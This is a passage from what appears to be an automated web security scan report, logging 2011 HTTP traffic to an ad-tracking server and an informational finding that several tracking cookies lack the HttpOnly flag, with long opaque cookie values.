J!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; lifb=o1s9XqSS1F_lTr7; ih="b!!!!]!'4@g!!!!#=$KA3!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!-5BI!!!!$=$J^*!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!.g(t!!!!#=)!a#!.g.)!!!!%=)!^q!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/JVV!!!!'='jNd!/[[9!!!!#=$L5r!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1W4@!!!!#=(1IO!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1qGe!!!!#=%1p'!1wmg!!!!#=)![j!2*,b!!!!#=(h4W!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2L<B!!!!#=(1ID!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2`+,!!!!#='hw!!2gH2!!!!#='i#o!2l>@!!!!#=(aKS!3$a2!!!!#=)5nT"; vuday1=.YdUZNGAXvW^rAL; pv1="b!!!!/!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!$'!_!$5*F!%1#4!1W4@!%uAQ!!!!$!?5%!*)IX>!?Q8(!(1br~~~~~~~=(1IO=*.n+!!!([!!3^d!!E)$!$XwX!/+NP!#bCp!'9kN!?5%!(glx6!w1K*!%4=%!$u!@!$F%,~~~~~=(aOb=/%Zq~!#0:.!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!$$eQ!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!#aQ9!!E)(!$XwW!1wmg!%+@A!!!%%!?5%!)e#I<!w1K*!%4=*!#(jY!'+(>~~~~~=)![p=-6G!~!#3yC#[gVp!$glF!1`)_!%bq`!!!!$!?5%!)e#I<!w1K*!',LB!$iom!'pCX~~~~~=)![y=-6G,~!$3Gv!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3Gx!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H!!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H$!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~"; liday1=NMJ:9NGAXv_DzI$; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:54 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%:!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#7jn~~!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8T@~~!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!,=(6NF!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7!!!!!#=(:!J!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65~~!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#bj8~~!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#g)O!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b~~!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!,=(6V[!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S~~!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+2C~~!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$,r9~~!$-'0!!!!#='i$,!$-pv~~!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$/Ck~~!$/Cl~~!$/Cy~~!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; path=/; expires=Sat, 22-Jun-2013 13:44:54 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Thu, 23 Jun 2011 13:44:54 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

8.9. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_1Kc5="MLsXtTENJApvJ5G+CtKgxLFQnfhOvCZv6FO6CurHXyYWkAe+Easvolr+8h/hlLolJXfHH1R2xVtDscJ70PLT/+809mgUaJ5mTFeMH5/cdQ1oQMzjQrR8lT1kMQ7bzpbC9YrXitTYyvZMM7dP4X0FE4fLVQT35pwmHJMjeULAg9+Bg9j2pt4T+Bil+yJVkZKHhA6o678iRjiJMPfG6wwANbikhywOGtfmMiOndWnapurGYT+mXqNaIxywxWjyHixOV2MmttktQ7n/s1JIyPfuNTy6RoZFymhaYv4K1CxTW5D2KVK5tCgCbyuo1rwC69C+v/IuDeE6aJ61YjmUNAIN4AFAIXUYGz1WZlcVZqPfVcL8IPe6zX7fXbCi2bc8ywC87epLflVMoerTEodXeL9SBn70Xhw5lcP15HielZUpYNyDg0N0zZUIM+0JsxprAQSiEgnYvoprWsXU6DTVmIFEsuidLnUJlYYOJtxZEDkEABBv7NT27l8LGl/yIDZhjgij0HYVYfLzzBGc3/Zi5OKew/Am5f0lo+6Yw3wf1tLyLatjtijbv95GzxvjVBoKEgmj2uhUORLdFjkAwAh309Sb+i/PE/BXzcebGGN9+yusxQ83We0isURCSAX4EPCjXKTXe644RprGK/ovXStUZLTpD35VCFkTrUaO8VqMv/hl9kYcwQ2n9IAaY+/NgH86zYd6G9X3H6Sssap4VA0D62aDit0V8PHhJkjIsGKEKgwWP2ZRWiZsUrnTcRiFgWghVJQgUwxPA89iBBfCp6OV79l3ch09a8prWj4WzUFShpHgZWm6G857lM/Up/cD6d0nqw/UdxHf8B+jwrHBdltXD+FuIWKXFb+RwRd8ynfoc9VsphzmXzOSgPkYuxQ7hsHV0Hq/HJHSzW/LYXy/9h2M8O+tc+1oIlmaxhfvZiMqStfUsdh9L0klPVQG17Jaku/axTNUBasimo15hj6/R/83msTCxsK/ibsuarY2lOyAzY6Q0sKGiLBGtg5AD/GL1k3MunISFgHwVvqkOES3D7Xaxd2FOgJUok1kNo1Cm+EVSt8/RqmzMs9cQZRcQa7d3Zqw69m/rMnt1cqAjaZReekrd/gx95bcJSqtCoLaHTwGIgtKx8TbbafXtrBLKj7lRHF2yEOzwn+Hva6YZQOzh6L5z62t2XHyf4l49gbIFGQQ4gEl6lt+9qOiV/etCO5e5tcsubEmJ1O7NU0L0y32gbvVu6ZghCHF6eErhYxKB+uF99qGw7fT6qEwqjoP2cjDX3M1CA4qMQBfMOZr4xEG93vu+i9zYjr9xFJHA/txVLLWfK/bAKKmN6fqLbcY2pW5lpqW+DKNi6xLKXmhCJt0YP0gMlFmQMsihPn4MV2v59cKlLSELXAgqbss7TVL5/B0TuuGU260dpfoFeu/WPk7u692kEmK/35h0RMwc0jbzF6vxnRGrAaILWXqGPCqh6+m6klAECZ3k8Pip7U9FzhBNFsrRNlmJKqdqKMFjwz5rabHXZLVOXOXedIPKkEK/6XjPQsOHXAgqbxODNSx6V/1JTWTSDMGCmB+byRP++NOZtgq4TmLWKiCCOorMLnJvQPErJgDh+B8gA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=G07610 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.viti.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_x5er="MLsXtSMNbzpvJREZ68UcOOELrMtuPiIcCFkCnclTxJH8vk8TdcY5465J7VBINn40uY1VQWw6JvjAI9t21D7Bk/o4BGnARfz2D8J9JpKmmLrJwmjhu+F9kS5HBlosiV+MwZlRpo0Yic5I7OwUqEFmbnJVDaLqlSgeJ/pHvCqc3sVLFzxLw8MQ3dmk9yVVFYnzxsr8iYJBk0DOpTWbdg1qj0zZ+WHbRhhUG0jd4yT/ZdRgSBa7Qcioo01+P881F/DtQVXIoeBjo+fSGHr7Hm616pD1S+rp4T6szpEDuIB6JXtt3LM4OZ2D4Ql2AgapEhjc61SHhQSqzoz+B6MuA4pEs7oTuNMKNnTMBK8HFPC2w0ylwb2IbnSo7BtekfnjeG0WGR0n5bdkrjkHh1ha4pHuQ+Qm71mjHzjR9jUJy4pBtjIMmQOisxaeRr7i3Q51KDjYLHsfF17k/h3RRZ2Kz0Es2MOg5dP7NgAN8Gbd72FnAkRVB9sURu09fIxVicKPPWVp393mx/72fqMKlbhej8hLfVnPWSdc8IkAuNByGNJ4mCK6EsGZkx9ymq6Qaki9vuOA4Y0BJtuwxywO2wh3kzFPXu0ekEsFNf+EyX0U2cDoJGvuLGhxzpwV8I2842FUPTRxfcQTYvGOo6N2FFg3ATETybTP4PlZH0jFFk7n3mfFRcit74J7eiwCBqLUXbmAgFq8wYWDzHO0b9se8K34r3+arxK6o7qlvZJhy3nCbI7xIFSDqTRfgPLlmsxCW7rYYU92wmM9mIWT2aj001qjH0OFz8R/sqNySK1l2PnfcBFCB80n2V82LxLOw6/mJe6JcUxFOmrOsylOxOCwJmB6Ts607wrnVVIcTt2go27IlWFiEBVBy+i0HKKLmTJ1vV5MTY33oZ5PG074Wp+iiW5rlRWPlmHONXB9mtG8hC9sLk1qHArZ6/D6pzphfYKHXKApg+Cj4Wuyg42siPA826mPNz6os5bQx1z7tKKDuLy+l3C4eknnzcatEuEQRQ+9zdFFyfYmCVlF8VD2rzkBDrHfT7srmoLMmMYwTtDyt7dohSAfrb/B7shmxeIhC7Xdm62f5YOCi7VnQ25U96jf6V5u7ADZwigBDvvvtDCgBpD1qrpk5pp4l152gjxk4EQYYr9wK4KSK+RT6QdLqpLmEZit5Qwmufxfw02Q48TSIdQh8bEBLwbz5yeNAP3lYHA3/yI9iOq7R0oFD8y4sxZT4qIFLUplwQGJni2pRVG3ZpqBgCqmWoApZw2LkxfS9ozRkR5lKkLCp+8CLuIB6eTs791Nx11Avipvs5BgJHxC96nQQOxCCjvABvhdxvIML0oZ25qey4qO5JlLmXLv3H69/srXaHpuF0I1yC8xzyfGwzdFShq6QGPGCHpf8JIrSvVXukYt8ee58Gc30EvqlxSK3HE9/BmDzgFiJBr6iPHhVfzHL2sV9j6BQQYc+Yn6SUBKiCMGIjDrFGxoTHwByfc2v/aSMT45dNX64BwOyL89dYdND8vOzxYS/8AaxCCDscccYcQ9L4kWtDHZ4zM7NQFnbPkAVzIU5TPUo2EJ8Rhi/bSKU7znZqNZruBBE7WnlneSmXPTIH+qfpA="; rsi_us_1000000="pUMV4imj8AcUrmz9liw1aYw2dfGs5o1KAlJo9K0QCDj4fNEUgv6Osz0QwizypDUDUf2xk+aOWuVDyO8hzpmmYBx1CRMLfX7QwzqiaE+1QNdw1+AaekUvdFR5uE8qBkHRBwkPJIBP2FbpitJPBuuo7gkELG2+RqB0VDohT7Me5m13qI7No+VeB9axmFJ057pfYGC09oaS7CrUwsiRwsTI3fpakF25ka5l935Woi4KMh2UOACyszwk5LA290xFFWqRFHgGlRkNAYA5H7GFwi0kBGrezDcczqNHN4mruecEyd2eDUm776F5eZcWS8hIOWLEi5YhFa+gTmJoZ9UfoHJ7hpqMXiEt5OFNwHP3DvBULviv4JBXxCkMXzMBdLkLs8l6jpBqSc33Q8jNp2jqsn14Kt9bMhj2Jc7vVfKTyS5Yf2CQtdS8EKc+Edxxr8wgWSOMUTdAPNRjFAVFD/iFzZDjw4pg8JqGFLrag37IMvIo4Tv1Jp5BzrmuNY3Xg2qJBhWQu31O6CZ9zDYYlpcRjfrFXJ6ajZ20XbdpVxE3CBvLjwKc7VxtCSS/FY/QGKSDVEN9YPzAphoa9t6vJjy98H5UnTow+skqAv4N3DWRl5hxLfMVUtJq7fLG3URg0rCjk4X1NvkJbOdnl8AmogqnI/vdC66uWnrmw5+EhmRA3WzlSfupBTTEoQoVAqshNyuGKdTweE17UYWuTgi/91eyKBakHOMLCdP2Pr/iROuPNVzPXYhI3Lefs9wJ+9C1PgLmdB4Udw7rWoP6kHG1HiwNxRQIpA5GftY03wmpQenPoMWE1ZwwnEU8cdHBEEDWlBEU9cVNL8e73jfNMplqSEu/nsTivyhQQiT4d2YTI0+U1wRJyjk8ryqXlAjZvXcU4orEEQy2NzArOsSYBnu4m7YnhU4oC4RqqoUH1Q2dyavHA/UJFqz2grtynPE1YuEzlRdKnoaJJwEQvbNBTLrw6WskwReKKpQxrCdaziLhXRcHQwPiyZFmBqt6FKDhSg33Za8Dkms7Z3eLZMlk2U4He+odM4KAsTHdliBISMxQjNcujYbHSBBNkBwjwL16uVRE2eClLf1/KtJzhdH/HoKd8lpSwnUn0ul+aIsJkDgD7+9q+7FxZNCm6TqYjZYwTtiJQMxaJXZoIp8InCgvjeFvP8E9oSHxXyA03nPopEDxuS7DK7DwVHeiBU9LjarAimg90LG1cZQIEncKlpEwGSJ6tqiNDaz6Zc4XjW6iOiRsAJeI0kP4ZdzzeGgx6LWBU4hOgbuk6w7qkRyajPeH0utpnB6Nrd362VMjcxxkTzYzPbGA/Hz8LsQxiEkUrMKYcgCEneltd0h3YwjrbxqhfwQGUqfmemYFk+Snxc3nuPvdLKfmbZziYRjb7vqHmLP5V0hCf4Wcve6oKaQDxGfUW+dowbiVxi0oTTOQW3F2ovGx9C0YUFfvoAd0ONen0u76F+9SmD6ITSnQ998o2ZBrpRXiu8EQb3z82Wo9FYAm/J8CAKYWljsQpIuedJjWlrVG71v